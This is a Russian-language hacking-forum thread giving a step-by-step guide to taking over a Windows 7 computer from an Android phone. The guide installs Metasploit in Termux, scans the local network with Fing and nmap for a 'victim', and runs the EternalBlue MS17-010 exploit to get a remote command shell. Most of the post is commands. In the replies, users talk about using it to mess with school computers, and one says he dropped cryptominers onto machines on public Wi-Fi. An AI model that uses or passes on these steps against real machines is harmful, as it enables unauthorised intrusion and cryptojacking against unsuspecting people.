Загрузка...

Лёгкий взлом компа с андроида eternalblue

Тема в разделе Kali Linux создана пользователем Darkhaese208060 7 авг 2018. 20 959 просмотров

Загрузка...
  1. Darkhaese208060
    Darkhaese208060 Автор темы 7 авг 2018 19 12 ноя 2017
    Статья не совсем про KALI, ну просто не знал куда выложить эту тему, поправьте в комментах.




    Всё что нам для этого понадобится:

    • Прямые руки
    • Телефон на андроиде
    • Fing
    • nmap
    • termux и metasploit или kali nethunter
    1)
    Для начала скачаем termux из google play
    Теперь установим metasploit:

    Для этого введем серию команд:


    Код
    apt update

    apt upgrade

    apt install curl

    curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh

    cd metasploit-framework-4.14.28

    ./msfconsole

    Знаю загрузка довольно долгая но нужно потерпеть.


    После всего у нас должен открыться metasploit

    [IMG]

    После того как вы установили metasploit.

    2)Сканирование сети c Fing
    Теперь посмотрим кто есть в нашей сети:
    Для этого удобно использовать утилиту Fing
    Вот так выглядит моя локальная сеть(у всех по разному):


    [IMG]

    Можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

    3)Сканирование на открытые порты c nmap
    Установим этот чудесный инструмент:

    Код
    apt-get update

    apt-get install nmap

    ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
    Код:
    nmap ip жертвы
    В моём случае это:
    nmap 192.168.1.104
    Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
    Вот что мы видим:


    [IMG]

    У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.

    4)Проверка уязвимости
    Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
    Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
    в metasploit вводите:
    Код:
    use auxiliary/scanner/smb/smb_ms17_010
    Здесь нам нужно указать только ip адрес жертвы
    Код:
    Выглядит это так:
    set RHOSTS ip жертвы
    В моём случае это:
    set RHOSTS 192.168.1.104
    Запускаем **** командой

    run


    [IMG]

    Если мы видим что-то подобное значит хост уязвим к эксплоиту

    5)Теперь завершающая стадия:использование эксплоита

    В том же metasploit пишем

    Код
    use exploit/windows/smb/ms17_010_eternalblue
    Здесь нам нужно указать ip жертвы и процесс
    Ip жертвы:
    Код:
    Выглядит это так:
    set RHOST ip жертвы
    В моём случае это:
    set RHOST 192.168.1.104
    И процесс
    Код:
    set ProcessName explorer.exe


    [IMG]

    И после того как вы закончили данные манипуляции можно запускать эксплоит

    exploit
    Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компьютера.


    [IMG]

    [IMG]

    [IMG]
     
  2. Nikasss_inactive489732
    У кого нет папки metasploit-framework-4.14.28 нужно написать после 4 действия
    chmod +x metasploit.sh
    ./metasploit.sh
    Ждем...
    И теперь она у вас должна появиться (лично у меня так)
     
  3. vladik2002_inactive
    Любые компы можно взломать? Или тока тот который подключен к моей сети?
     
  4. FluttyParty
    FluttyParty 9 авг 2018 57 6 апр 2017
    Перезалей предпоследние скрины,а так годно,в школе поуагарать с компами можно
     
  5. HideHard
    HideHard 9 авг 2018 Заблокирован(а) 11 17 июл 2017
    Какая версия андроида у тебя?
     
  6. Nikasss_inactive489732
    Xiaomi Redmi Note 5 Android 8.1.0
     
  7. Nikasss_inactive489732
    Так же на канале overbafer1 есть видио по этому



    P.S. Только там нету способа как это сделать без доступа к ПК
     
  8. Nikasss_inactive489732
    Можно все но чтобы передать metasploit жертве нужно нужен или прямой доступ к ПК или быть в одной сети чтобы через nmap перекинуть жертве
     
  9. Nikasss_inactive489732
    Отвечаю на свой вопрос:
    Нужно прописать команду pkg install ruby и всё
     
  10. iRezzi_inactive124976
    iRezzi_inactive124976 13 авг 2018 Дизайнер 14 8 июн 2017
    Единственный минус на 32 бит не идёт я у себя в городе ходил по фри вифи и через метерпетер скидывал майнеры
     
  11. SMYRF
    SMYRF 14 авг 2018 0 26 сен 2017
  12. Pavlik228hacker
    Pavlik228hacker 4 дек 2018 Заблокирован(а) 3 4 дек 2018
     
  13. Pavlik228hacker
    Pavlik228hacker 4 дек 2018 Заблокирован(а) 3 4 дек 2018
    An error occurred while installing
    nokogiri (1.8.0), and Bundler cannot continue.
    Make sure that `gem install nokogiri -v '1.8.0'
    --source 'https://rubygems.org/'` succeeds before
    bundling. Что делать
     
  14. kurba
    kurba 7 дек 2018 57 25 авг 2017
    посмотри на верх в коментах там все написано
     
  15. LordGeron
    LordGeron 14 дек 2018 0 13 дек 2018
    Какие функции у данного експлоита?? В help всего 4-7 команд
     
  16. Dunya228
    Dunya228 17 дек 2018 #CYBERBASTARD 40 29 янв 2017
    Хелп, пишет: Could not find tzinfo-1.2.3 in any of the sources
     
  17. Openso
    Openso 21 дек 2018 TRON drainer - zelenka.guru/threads/5126016/ 152 18 окт 2018
    Меняй, там команда не apt а pkg( это не дебиан или убунту)
     
  18. Dunya228
    Dunya228 21 дек 2018 #CYBERBASTARD 40 29 янв 2017
    рутировать телефон нужно?
     
  19. Openso
    Openso 22 дек 2018 TRON drainer - zelenka.guru/threads/5126016/ 152 18 окт 2018
    Dunya228, я понял, это пример запуска в оболочке нетхантер, тогда нипиши так.
     
  20. Dunya228
    Dunya228 22 дек 2018 #CYBERBASTARD 40 29 янв 2017
    Ну да как бы, а есть что то другое?
     
Top